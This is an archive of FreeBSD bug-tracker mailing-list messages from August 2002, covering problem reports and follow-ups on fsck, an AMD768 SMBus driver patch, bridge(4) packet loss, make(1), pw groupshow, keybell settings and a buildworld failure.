(PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KAiBJU068869; Tue, 20 Aug 2002 03:44:11 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KAiBgQ068865; Tue, 20 Aug 2002 03:44:11 -0700 (PDT) Date: Tue, 20 Aug 2002 03:44:11 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208201044.g7KAiBgQ068865@freefall.freebsd.org> To: ticso@cicely.de, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12398: fsck in free(): warning: pointer to wrong page. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: fsck in free(): warning: pointer to wrong page. State-Changed-From-To: open->feedback State-Changed-By: schweikh State-Changed-When: Tue Aug 20 03:43:29 PDT 2002 State-Changed-Why: Does this also happen on a recent -stable? Or -current? http://www.freebsd.org/cgi/query-pr.cgi?pr=12398 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 3:47:49 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E322837B400; Tue, 20 Aug 2002 03:47:47 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9378B43E42; Tue, 20 Aug 2002 03:47:47 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KAllJU069064; Tue, 20 Aug 2002 03:47:47 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KAll1J069060; Tue, 20 Aug 2002 03:47:47 -0700 (PDT) Date: Tue, 20 Aug 2002 03:47:47 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208201047.g7KAll1J069060@freefall.freebsd.org> To: powersurge@technologist.com, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/13698: Here is: a euro character for syscons & improved keymaps. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Here is: a euro character for syscons & improved keymaps. State-Changed-From-To: open->closed State-Changed-By: schweikh State-Changed-When: Tue Aug 20 03:46:49 PDT 2002 State-Changed-Why: We have Euro symbols for some time now in the iso15-* fonts. http://www.freebsd.org/cgi/query-pr.cgi?pr=13698 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 4:18:48 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8D66537B400; Tue, 20 Aug 2002 04:18:46 -0700 (PDT) Received: from srv1.cosmo-project.de (srv1.cosmo-project.de [213.83.6.106]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5ADCC43E4A; Tue, 20 Aug 2002 04:18:45 -0700 (PDT) (envelope-from ticso@cicely9.cicely.de) Received: from cicely5.cicely.de (cicely5.cicely.de [IPv6:3ffe:400:8d0:301:200:92ff:fe9b:20e7]) (authenticated bits=0) by srv1.cosmo-project.de (8.12.5/8.12.5) with ESMTP id g7KBIcYR097545 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK); Tue, 20 Aug 2002 13:18:42 +0200 (CEST) (envelope-from ticso@cicely9.cicely.de) Received: from cicely9.cicely.de (cicely9.cicely.de [IPv6:3ffe:400:8d0:301:210:5aff:fe30:1c1a]) by cicely5.cicely.de (8.12.1/8.12.1) with ESMTP id g7KBIbFJ026859 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Tue, 20 Aug 2002 13:18:38 +0200 (CEST)?g (envelope-from ticso@cicely9.cicely.de) Received: from cicely9.cicely.de (localhost [127.0.0.1]) by cicely9.cicely.de (8.12.5/8.12.5) with ESMTP id g7KBIFXN097077; Tue, 20 Aug 2002 13:18:15 +0200 (CEST) (envelope-from ticso@cicely9.cicely.de) Received: (from ticso@localhost) by cicely9.cicely.de (8.12.5/8.12.5/Submit) id g7KBIFJs097076; Tue, 20 Aug 2002 13:18:15 +0200 (CEST) Date: Tue, 20 Aug 2002 13:18:15 +0200 From: Bernd Walter To: Jens Schweikhardt Cc: ticso@cicely.de, freebsd-bugs@FreeBSD.org Subject: Re: bin/12398: fsck in free(): warning: pointer to wrong page. Message-ID: <20020820111814.GN93644@cicely9.cicely.de> Reply-To: ticso@cicely.de References: <200208201044.g7KAiBgQ068865@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208201044.g7KAiBgQ068865@freefall.freebsd.org> X-Operating-System: FreeBSD cicely9.cicely.de 5.0-CURRENT alpha User-Agent: Mutt/1.5.1i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Aug 20, 2002 at 03:44:11AM -0700, Jens Schweikhardt wrote: > Synopsis: fsck in free(): warning: pointer to wrong page. > > State-Changed-From-To: open->feedback > State-Changed-By: schweikh > State-Changed-When: Tue Aug 20 03:43:29 PDT 2002 > State-Changed-Why: > Does this also happen on a recent -stable? Or -current? > > http://www.freebsd.org/cgi/query-pr.cgi?pr=12398 Ups - I'm feeling ashamed for not following my own report. No - It's not reproduceable anymore. I can hardly remember that it was fixed before 4.0-RELEASE. -- B.Walter COSMO-Project http://www.cosmo-project.de ticso@cicely.de Usergroup info@cosmo-project.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 4:52:52 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 41B2B37B400 for ; Tue, 20 Aug 2002 04:52:44 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5A42643E4A for ; Tue, 20 Aug 2002 04:52:43 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KBpNJU088310 for ; Tue, 20 Aug 2002 04:51:23 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KBpMxe088309; Tue, 20 Aug 2002 04:51:22 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1B26E37B400 for ; Tue, 20 Aug 2002 04:40:14 -0700 (PDT) Received: from yebisu.j.dendai.ac.jp (yebisu.j.dendai.ac.jp [133.14.49.224]) by mx1.FreeBSD.org (Postfix) with ESMTP id B3E3743E42 for ; Tue, 20 Aug 2002 04:40:13 -0700 (PDT) (envelope-from fujimoto@yebisu.j.dendai.ac.jp) Received: by yebisu.j.dendai.ac.jp (Postfix, from userid 1001) id 65FC64083F; Tue, 20 Aug 2002 20:40:12 +0900 (JST) Message-Id: <20020820114012.65FC64083F@yebisu.j.dendai.ac.jp> Date: Tue, 20 Aug 2002 20:40:12 +0900 (JST) From: FUJIMOTO Kou Reply-To: FUJIMOTO Kou To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41812: patch to detect/function AMD768 SMBus Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41812 >Category: kern >Synopsis: patch to detect/function AMD768 SMBus >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 04:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: FUJIMOTO Kou >Release: FreeBSD 4.6-STABLE i386 >Organization: Tokyo Denki University >Environment: System: FreeBSD yebisu.j.dendai.ac.jp 4.6-STABLE FreeBSD 4.6-STABLE #26: Tue Aug 13 00:25:35 JST 2002 root@yebisu.j.dendai.ac.jp:/usr/src/sys/compile/XPSMP i386 >Description: The attached patch for sys/pci/amdpm.c enables kernel to recognize AMD766/768 SMBus interface. AMD766/768 SMBus seems to be compatible with that of AMD756, and so the patch just adds PCI device IDs and modifies one conditional. >How-To-Repeat: It works fine with ASUS A7M266-D (AMD768 chipset) and ports/sysutils/xmbmon, though I never examined with AMD766 or other applications. >Fix: --- amdpm.c.orig Wed Oct 10 21:10:26 2001 +++ amdpm.c Mon Mar 11 14:27:58 2002 @@ -66,6 +66,8 @@ #define AMDPM_VENDORID_AMD 0x1022 #define AMDPM_DEVICEID_AMD756PM 0x740b +#define AMDPM_DEVICEID_AMD766PM 0x7413 +#define AMDPM_DEVICEID_AMD768PM 0x7443 /* PCI Configuration space registers */ #define AMDPCI_PMBASE 0x58 @@ -155,10 +157,14 @@ amdpm_probe(device_t dev) { u_long base; - + u_int16_t did; + + did = pci_get_device(dev); if ((pci_get_vendor(dev) == AMDPM_VENDORID_AMD) && - (pci_get_device(dev) == AMDPM_DEVICEID_AMD756PM)) { - device_set_desc(dev, "AMD 756 Power Management Controller"); + ((did == AMDPM_DEVICEID_AMD756PM) || + (did == AMDPM_DEVICEID_AMD766PM) || + (did == AMDPM_DEVICEID_AMD768PM))) { + device_set_desc(dev, "AMD 756/766/768 Power Management Controller"); /* * We have to do this, since the BIOS won't give us the @@ -215,8 +221,8 @@ if (!amdsmb_sc->smbus) return (EINVAL); - device_set_desc(dev, "AMD 756 SMBus interface"); - device_printf(dev, "AMD 756 SMBus interface\n"); + device_set_desc(dev, "AMD 756/766/768 SMBus interface"); + device_printf(dev, "AMD 756/766/768 SMBus interface\n"); return (0); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 5: 0: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DD15B37B401 for ; Tue, 20 Aug 2002 05:00:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8846143E65 for ; Tue, 20 Aug 2002 05:00:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KC06JU089826 for ; Tue, 20 Aug 2002 05:00:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KC06fL089825; Tue, 20 Aug 2002 05:00:06 -0700 (PDT) Date: Tue, 20 Aug 2002 05:00:06 -0700 (PDT) Message-Id: <200208201200.g7KC06fL089825@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: FUJIMOTO Kou Subject: Re: kern/41812: patch to detect/function AMD768 SMBus Reply-To: FUJIMOTO Kou Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41812; it has been noted by GNATS. From: FUJIMOTO Kou To: freebsd-gnats-submit@FreeBSD.org, fujimoto@j.dendai.ac.jp Cc: Subject: Re: kern/41812: patch to detect/function AMD768 SMBus Date: Tue, 20 Aug 2002 20:56:48 +0900 Oops, originator's address was wrong... the following is correct. fujimoto@j.dendai.ac.jp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 5:40:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2CE2437B400 for ; Tue, 20 Aug 2002 05:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7A96643E6A for ; Tue, 20 Aug 2002 05:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KCe2JU002188 for ; Tue, 20 Aug 2002 05:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KCe2cW002187; Tue, 20 Aug 2002 05:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ECA0237B400 for ; Tue, 20 Aug 2002 05:32:49 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id AD96643E6E for ; Tue, 20 Aug 2002 05:32:49 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KCWnOT055988 for ; Tue, 20 Aug 2002 05:32:49 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7KCWnjY055987; Tue, 20 Aug 2002 05:32:49 -0700 (PDT) Message-Id: <200208201232.g7KCWnjY055987@www.freebsd.org> Date: Tue, 20 Aug 2002 05:32:49 -0700 (PDT) From: Mark Rekai To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41816: bridge(4) not bridging on 4.6.2, 4.6.1, 4.4, others Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41816 >Category: i386 >Synopsis: bridge(4) not bridging on 4.6.2, 4.6.1, 4.4, others >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 05:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Mark Rekai >Release: 4.6.2 >Organization: >Environment: FreeBSD i0.inetu.org 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #1: Mon Aug 19 11:49:07 GMT 2002 root@i0.inetu.org:/usr/obj/usr/src/sys/mongrel i386 >Description: Kernel bridge(4) not working either as a static compile or loadable module. When net.link.ether.bridge=1 is first set, the bridge appears to pass ALL traffic normally for a period of time less than 1 second. After that, it appears as if about 98% of traffic is lost. I cannot determine if the kernel has a preference for forwarding some packets and not others. On a server with 2 NICs that will be doing nothing but bridging from one interface to another: Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Coll xl0 1500 00:50:04:68:61:12 221887 0 1 0 0 xl1 1500 00:50:04:9d:67:c6 0 0 8533 0 0 No messages are logged indicating what is happening to those 200,000+ packets that should have been bridged. >How-To-Repeat: Problem is always repeatable across differing hardware, across 4.6.2, 4.6.1, 4.4 (have not tried other version), & with PicoBSD. Problem is repeatable both with GENERIC kernel and my own custom kernel. Occurs with both xl and fxp NICs (have not tried others). Have tried on intel and asus/via mobos. >Fix: unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 5:52: 0 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 99AC137B400; Tue, 20 Aug 2002 05:51:58 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C7DF43E72; Tue, 20 Aug 2002 05:51:58 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: from freefall.freebsd.org (ru@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KCpwJU007325; Tue, 20 Aug 2002 05:51:58 -0700 (PDT) (envelope-from ru@freefall.freebsd.org) Received: (from ru@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KCpw2h007321; Tue, 20 Aug 2002 05:51:58 -0700 (PDT) Date: Tue, 20 Aug 2002 05:51:58 -0700 (PDT) From: Ruslan Ermilov Message-Id: <200208201251.g7KCpw2h007321@freefall.freebsd.org> To: sjr@home.net, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: bin/6612: make(1) doesn't understand targets with embedded `!' and `:' Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: make(1) doesn't understand targets with embedded `!' and `:' State-Changed-From-To: open->patched State-Changed-By: ru State-Changed-When: Tue Aug 20 05:50:39 PDT 2002 State-Changed-Why: Fixed in 5.0-CURRENT, in make/parse.c,v 1.39. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Tue Aug 20 05:50:39 PDT 2002 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=6612 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 6:30: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7375837B400 for ; Tue, 20 Aug 2002 06:30:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B540243E70 for ; Tue, 20 Aug 2002 06:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KDU2JU017707 for ; Tue, 20 Aug 2002 06:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KDU2qq017706; Tue, 20 Aug 2002 06:30:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4F62F37B400 for ; Tue, 20 Aug 2002 06:29:14 -0700 (PDT) Received: from Math.Berkeley.EDU (gold.Math.Berkeley.EDU [169.229.58.61]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9485D43E77 for ; Tue, 20 Aug 2002 06:29:13 -0700 (PDT) (envelope-from steve@Math.Berkeley.EDU) Received: from bootjack.math.berkeley.edu (root@bootjack.Math.Berkeley.EDU [169.229.58.46]) by Math.Berkeley.EDU (8.12.3/8.12.3) with ESMTP id g7KDTD0n019833 for ; Tue, 20 Aug 2002 06:29:13 -0700 (PDT) Received: from bootjack.math.berkeley.edu (steve@localhost [127.0.0.1]) by bootjack.math.berkeley.edu (8.12.3/8.12.3) with ESMTP id g7KDTC80038541 for ; Tue, 20 Aug 2002 06:29:12 -0700 (PDT) (envelope-from steve@bootjack.math.berkeley.edu) Received: (from steve@localhost) by bootjack.math.berkeley.edu (8.12.3/8.12.3/Submit) id g7KDTCIY038540; Tue, 20 Aug 2002 06:29:12 -0700 (PDT) Message-Id: <200208201329.g7KDTCIY038540@bootjack.math.berkeley.edu> Date: Tue, 20 Aug 2002 06:29:12 -0700 (PDT) From: Steve Sizemore Reply-To: Steve Sizemore To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/41817: pw groupshow doesn't include the login group Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41817 >Category: misc >Synopsis: pw groupshow doesn't include the login group >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 06:30:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Steve Sizemore >Release: FreeBSD 4.6.2-RELEASE i386 >Organization: UC Berkeley College of Letters & Science >Environment: System: FreeBSD bootjack.math.berkeley.edu 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Sat Aug 17 08:31:09 PDT 2002 root@chevalley.math.berkeley.edu:/usr/obj/usr/src/sys/MATH i386 >Description: The groupshow option of the pw command is supposed to show all members of a group. In fact, it only shows the members which are listed in the /etc/group file, omitting the default login groups specified in /etc/passwd. >How-To-Repeat: /usr/sbin/pw groupshow operator >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 7:33:43 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2FA2937B401; Tue, 20 Aug 2002 07:33:41 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C0A2443E72; Tue, 20 Aug 2002 07:33:40 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KEXeJU032502; Tue, 20 Aug 2002 07:33:40 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KEXZpY032488; Tue, 20 Aug 2002 07:33:35 -0700 (PDT) Date: Tue, 20 Aug 2002 07:33:35 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208201433.g7KEXZpY032488@freefall.freebsd.org> To: ticso@cicely.de, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12398: fsck in free(): warning: pointer to wrong page. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: fsck in free(): warning: pointer to wrong page. State-Changed-From-To: feedback->closed State-Changed-By: schweikh State-Changed-When: Tue Aug 20 07:31:27 PDT 2002 State-Changed-Why: Originator confirms it's not reproduceable anymore. Thanks Bernd! http://www.freebsd.org/cgi/query-pr.cgi?pr=12398 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 7:59: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5AF2D37B400; Tue, 20 Aug 2002 07:59:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0CD0E43E42; Tue, 20 Aug 2002 07:59:07 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KEx6JU037355; Tue, 20 Aug 2002 07:59:06 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KEx5gF037351; Tue, 20 Aug 2002 07:59:05 -0700 (PDT) Date: Tue, 20 Aug 2002 07:59:05 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208201459.g7KEx5gF037351@freefall.freebsd.org> To: soralx@cydem.zp.ua, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/41772: can't disable keybell Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: can't disable keybell State-Changed-From-To: open->feedback State-Changed-By: schweikh State-Changed-When: Tue Aug 20 07:55:26 PDT 2002 State-Changed-Why: The proper way to turn off the bell is keybell=off in rc.conf. If you do this on the command line, you need to redirect the tty, kbdcontrol -b off < /dev/tty does the trick for me on 4-STABLE. Please confirm if it works for you as well. PS: This is more appropriately asked on questions@ mailing list than in a PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=41772 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 8: 0:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 03E2337B400 for ; Tue, 20 Aug 2002 08:00:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 51D6E43E7B for ; Tue, 20 Aug 2002 08:00:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KF07JU037485 for ; Tue, 20 Aug 2002 08:00:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7KF07tt037484; Tue, 20 Aug 2002 08:00:07 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E4A5E37B400 for ; Tue, 20 Aug 2002 07:53:07 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id A723043E42 for ; Tue, 20 Aug 2002 07:53:07 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7KEr6OT090647 for ; Tue, 20 Aug 2002 07:53:06 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7KEr639090646; Tue, 20 Aug 2002 07:53:06 -0700 (PDT) Message-Id: <200208201453.g7KEr639090646@www.freebsd.org> Date: Tue, 20 Aug 2002 07:53:06 -0700 (PDT) From: Rafael Righi To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41818: Problem in make buildworld with 4.6.2 source sinchronized. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41818 >Category: i386 >Synopsis: Problem in make buildworld with 4.6.2 source sinchronized. >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 08:00:06 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Rafael Righi >Release: 4.6-RELEASE , i386 >Organization: Federal University of Santa Maria - Brazil >Environment: 4.6-RELEASE FreeBSD 4.6-RELEASE #1: Tue Jun 18 14:34:44 BRT 2002 >Description: Today (2002/08/20), I sinchronized my source-base with cvsup and I'd like do "make buildworld" and after make release to create a 4.6.2-RELEASE. I did "make buildworld" in /usr/src and after one hour (more or less) the process break wih a message: ===> etc/sendmail make: don't know how to make freebsd.mc. Stop *** Error code 2 OBS: The number of newvers.sh file is 1.44.2.23.2.17 >How-To-Repeat: Get the source-base an try to do "make buildworld" >Fix: I enter in /usr/src/etc/sendmail directory and found a Makefile. Inside this, I didn't found an entry to freebsd.mc. Is this Makefile correct? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 